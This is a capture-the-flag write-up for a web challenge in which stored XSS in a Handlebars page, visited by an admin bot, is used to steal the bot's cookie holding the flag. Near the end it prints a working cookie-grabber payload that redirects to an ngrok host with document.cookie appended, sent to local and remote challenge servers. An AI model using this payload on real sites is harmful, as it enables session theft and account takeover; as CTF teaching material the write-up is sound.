# Description
The work is going well on Santa's toy workshop but we lost contact with the manager in charge! We suspect the evil elves have taken over the workshop, can you talk to the worker elves and find out?

# Challenge
- We can a docker instance and download the source of the file
- Visiting the web page, it's just a website with some fancy JS running.
- Checking the downloaded source, there's a database running
```js
const Database      = require('./database');

const db = new Database('toy_workshop.db');
```
- Checking the `routes` folder, `index.js` is doing something with the queries
```js
router.post('/api/submit', async (req, res) => {

                const { query } = req.body;
                if(query){
                        return db.addQuery(query)
                                .then(() => {
                                        bot.readQueries(db);
                                        res.send(response('Your message is delivered successfully!'));
                                });
                }
                return res.status(403).send(response('Please write your query first!'));
});

router.get('/queries', async (req, res, next) => {
        if(req.ip != '127.0.0.1') return res.redirect('/');

        return db.getQueries()
                .then(queries => {
                        res.render('queries', { queries });
                })
                .catch(() => res.status(500).send(response('Something went wrong!')));
});
```
- We get a 404 on `/api/submit`?
- If we change it to a POST request wr get a 403.	
- We get a redirect on `/queries` since it checks if our IP is equal to `127.0.0.1`

# Exploit
- Let's try sending a POST request
```http
POST /api/submit HTTP/1.1
Host: 188.166.174.81:30934
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 41

{
   "query":"select * from table;"
}
```
```http
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 53
ETag: W/"35-jrW/GzpnDcXpkDan+rs+Epa0W9E"
Date: Thu, 02 Dec 2021 06:11:18 GMT
Connection: close

{"message":"Your message is delivered successfully!"}
```
- Now we need to somehow view the query in `/queries.`
- The query seems to take forever when setting `X-Forwarded-For` header
- I tried other headers to spoof the IP Address but doesn't seem to work.

# Revisiting the files.
- I took a step back and decided to look back at the files and host them locally.
- I also decide to comment out the IP restriction 
```js
//if(req.ip != '127.0.0.1') return res.redirect('/');
```
- Now I can view `/queries` locally on my port.
-	It seems to be rendering what we sent from `/api/submit`.
-	Looking in the `views` folder, I found `index.hbs` and `queries.hbs`
**Queries.hbs**
```html
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <title>Toy Workshop</title>
        <link rel="icon" href="/static/images/logo.png" />
        <link rel="stylesheet" type="text/css" href="/static/css/nes-core.min.css" />
        <link rel="stylesheet" type="text/css" href="/static/css/dashboard.css" />
    </head>
    <body>
        <img src="/static/images/cflower.png" class="main-logo" />
        <p class="pb-3">Welcome back, admin!</p>
        <div class="dash-frame">
            {{#each queries}}
            <p>{{{this.query}}}</p>
            {{else}}
            <p class="empty">No content</p>
            {{/each}}
        </div>
    </body>
    <script type="text/javascript" src="/static/js/jquery-3.6.0.min.js"></script>
    <script type="text/javascript" src="/static/js/auth.js"></script>
</html> 
```
-	Searching hbs is a template engine called `HandleBars`, I tried multiple injections techniques and it didn't work. 
-	But at some point, I decided to try XXS injection.
**Request sent on Burp**
```http
http://206.189.24.71:32733/api/submit query="<script type='text/javascript'>alert(1);</script>"
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 53
Content-Type: application/json; charset=utf-8
Date: Thu, 02 Dec 2021 09:20:48 GMT
ETag: W/"35-jrW/GzpnDcXpkDan+rs+Epa0W9E"
Keep-Alive: timeout=5
X-Powered-By: Express

{
    "message": "Your message is delivered successfully!"
}
```
- And I got alert locally on `/queries` when visited.
- But the problem here is that on the real site, we can visit `/queries` to trigger it.
- But here's the catch, in `bot.js` a bot function will visit `/queries`
```js
const readQueries = async (db) => {
		const browser = await puppeteer.launch(browser_options);
		let context = await browser.createIncognitoBrowserContext();
		let page = await context.newPage();
		await page.goto('http://127.0.0.1:1337/');
		await page.setCookie(...cookies);
		await page.goto('http://127.0.0.1:1337/queries', {
			waitUntil: 'networkidle2'
		});
		await browser.close();
		await db.migrate();
};
```
-  And the flag is stored in the cookie? So a XSS Cookie Grabber!

# Exploit Remastered
- I first tried it locally on the docker setup for Proof of Concept
```sh
┌──(kali㉿kali)-[~]
└─$ http POST http://localhost:1337/api/submit query="<script type='text/javascript'>document.location='https://1dbf-14-192-208-52.ngrok.io/'+document.cookie;</script>"
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 53
Content-Type: application/json; charset=utf-8
Date: Thu, 02 Dec 2021 09:20:48 GMT
ETag: W/"35-jrW/GzpnDcXpkDan+rs+Epa0W9E"
Keep-Alive: timeout=5
X-Powered-By: Express

{
    "message": "Your message is delivered successfully!"
}
```
- After a while, we get a hit with the fake flag!
```http
GET /HTB{f4k3_fl4g_f0r_t3st1ng} 404
```
- Knowing that this works, let's try on the real server.
```sh
┌──(kali㉿kali)-[~]
└─$ http POST http://206.189.24.71:32733/api/submit query="<script type='text/javascript'>document.location='https://1dbf-14-192-208-52.ngrok.io/'+document.cookie;</script>"
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 53
Content-Type: application/json; charset=utf-8
Date: Thu, 02 Dec 2021 09:20:48 GMT
ETag: W/"35-jrW/GzpnDcXpkDan+rs+Epa0W9E"
Keep-Alive: timeout=5
X-Powered-By: Express

{
    "message": "Your message is delivered successfully!"
}
```
- Now let's wait for a while on our ngrok server.
- We get a hit!!

```http
GET /TB{3v1l_3lv3s_4r3_r1s1ng_up!z}  404
```
